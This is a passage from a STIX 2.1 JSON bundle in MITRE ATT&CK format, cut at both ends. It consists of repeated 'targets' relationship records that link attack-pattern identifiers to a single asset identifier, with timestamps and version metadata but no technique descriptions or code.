"x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b871cd07-3e06-4185-9c97-be406755526f", "created": "2024-07-01T10:37:15.824737", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824739", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--548f1fad-791e-43fe-8a5e-64561fc504d3", "created": "2024-07-01T10:37:15.824747", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824750", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c474e768-8ea3-41f0-b0b8-853c06e35e0c", "created": "2024-07-01T10:37:15.824758", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824760", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--09b008a9-b4eb-462a-a751-a0eb58050cd9", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3b6f1761-1911-40d3-a2df-33e67c9b9c24", "created": "2024-07-01T10:37:15.824768", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824770", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--09b130a2-a77e-4af0-a361-f46f9aad1345", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--bafd3955-6d17-4c15-b8fc-642c2121ce86", "created": "2024-07-01T10:37:15.824778", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824780", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--09c4c11e-4fa1-4f8c-8dad-3cf8e69ad119", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a3bc62bf-8767-4fb4-ada1-594d02657bed", "created": "2024-07-01T10:37:15.824788", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824790", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--27ea9a4a-bade-4ef7-ba7e-a869c579504e", "created": "2024-07-01T10:37:15.824798", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824800", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0a5231ec-41af-4a35-83d0-6bdf11f28c65", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4805f0ab-6286-4727-8dd2-6f0713218033", "created": "2024-07-01T10:37:15.824808", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824810", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0af0ca99-357d-4ba1-805f-674fdfb7bef9", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3db0e55e-c3a7-4988-8c1f-3d4911d1c302", "created": "2024-07-01T10:37:15.824818", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824820", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0bda01d5-4c1d-4062-8ee2-6872334383c3", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--fb73048a-d5ff-4d9b-b198-c2f6dafe6d15", "created": "2024-07-01T10:37:15.824828", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824830", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2d194e50-b9fb-4f64-99c6-254e6553134e", "created": "2024-07-01T10:37:15.824839", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824841", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0cf55441-b176-4332-89e7-2c4c7799d0ff", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--db981e35-b1a7-4fd8-975f-df076293a516", "created": "2024-07-01T10:37:15.824849", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824851", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0cfe31a7-81fc-472c-bc45-e2808d1066a3", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0f50fbe7-1e81-4b07-bd6f-cf7e3a29f4cc", "created": "2024-07-01T10:37:15.824859", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824861", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0d91b3c0-5e50-47c3-949a-2a796f04d144", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c24b7035-67bb-4047-a59e-ba48c5c1c72d", "created": "2024-07-01T10:37:15.824869", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824871", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0df05477-c572-4ed6-88a9-47c581f548f7", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--98d67735-58f3-4075-917c-d979b3f11dc3", "created": "2024-07-01T10:37:15.824879", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824882", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2371531c-33a0-4207-bb60-53604b7f3c20", "created": "2024-07-01T10:37:15.824889", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824891", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3d3fc7cf-ac19-437e-a675-9941b23a13c7", "created": "2024-07-01T10:37:15.824899", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824901", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1035cdf2-3e5f-446f-a7a7-e8f6d7925967", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--80e95482-23f0-4916-932b-d0704a855874", "created": "2024-07-01T10:37:15.824909", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824912", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c441db98-11b2-4770-83da-b561e315997c", "created": "2024-07-01T10:37:15.824920", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824922", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--10d51417-ee35-4589-b1ff-b6df1c334e8d", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--26fbf56c-a4a2-4a88-abd5-836ae58c1cf4", "created": "2024-07-01T10:37:15.824930", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824932", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--10ffac09-e42d-4f56-ab20-db94c67d76ff", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0048fc06-5dda-457e-9ca5-436e1824fd19", "created": "2024-07-01T10:37:15.824940", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824943", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--23cc1592-ecee-4bc0-b9a3-bec787e3d63c", "created": "2024-07-01T10:37:15.824951", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824953", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--132d5b37-aac5-4378-a8dc-3127b18a73dc", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--83eda668-5519-4c0f-a634-7956dd69eb16", "created": "2024-07-01T10:37:15.824961", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824963", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1365fe3b-0f50-455d-b4da-266ce31c23b0", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3fe5ed14-37cb-4569-9158-b0e04e9f05b8", "created": "2024-07-01T10:37:15.824971", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824973", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--143c0cbb-a297-4142-9624-87ffc778980b", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f29d70be-d979-44c2-bb85-a915809b11ef", "created": "2024-07-01T10:37:15.824984", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824987", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--15dbf668-795c-41e6-8219-f0447c0e64ce", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--586b717b-adf9-4341-874a-e2c0377fb2a1", "created": "2024-07-01T10:37:15.824995", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.824997", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1608f3e1-598a-42f4-a01a-2e252e81728f", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e3af814d-297d-4232-8e85-5e3bd33df48c", "created": "2024-07-01T10:37:15.825006", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825008", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8a931c46-99ce-4e04-8b28-320d38c5c337", "created": "2024-07-01T10:37:15.825016", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825018", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--191cc6af-1bb2-4344-ab5f-28e496638720", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--29cb550a-2f71-43ac-8f98-de1e628453d7", "created": "2024-07-01T10:37:15.825026", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825028", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1988cc35-ced8-4dad-b2d1-7628488fa967", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--060c582b-7138-475b-b42a-2d615c460a31", "created": "2024-07-01T10:37:15.825037", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825039", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1996eef1-ced3-4d7f-bf94-33298cabbf72", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0802e1eb-a718-4de3-91b7-08b7bdff1821", "created": "2024-07-01T10:37:15.825047", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825049", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1a80d097-54df-41d8-9d33-34e755ec5e72", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--93e56a92-4c81-4ab1-b5dd-560b5204f9e2", "created": "2024-07-01T10:37:15.825057", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825059", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1b7b1806-7746-41a1-a35d-e48dae25ddba", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8b5c990d-5ea4-4c20-a029-1c316ae0bad0", "created": "2024-07-01T10:37:15.825067", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825070", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d16b4fa3-7f15-4077-b230-9f234da63406", "created": "2024-07-01T10:37:15.825078", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825080", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8bcce5f1-4245-482c-84c2-b7950bc736ff", "created": "2024-07-01T10:37:15.825088", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825090", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f934971b-0eb0-4188-87c4-226f56db0143", "created": "2024-07-01T10:37:15.825098", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825100", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1cfcb312-b8d7-47a4-b560-4b16cc677292", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4e95e95d-cba0-4ef0-8098-d9261c8c1e33", "created": "2024-07-01T10:37:15.825108", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825111", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1d24cdee-9ea2-4189-b08e-af110bf2435d", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--57952f44-bcb0-4d4b-8da4-58ef5baed367", "created": "2024-07-01T10:37:15.825119", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825121", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f9b44738-28d2-4181-82ba-fb32d81457be", "created": "2024-07-01T10:37:15.825129", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825131", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--208884f1-7b83-4473-ac22-4e1cf6c41471", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5dd04da7-ddc2-4b6f-8b80-ff546eaa5ece", "created": "2024-07-01T10:37:15.825141", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825143", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e69793dc-f37e-4168-bf54-b8b59dbd7843", "created": "2024-07-01T10:37:15.825151", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825153", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--215d9700-5881-48b8-8265-6449dbb7195d", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e68a9376-dad2-4a4d-a3ef-67a09b60cdd1", "created": 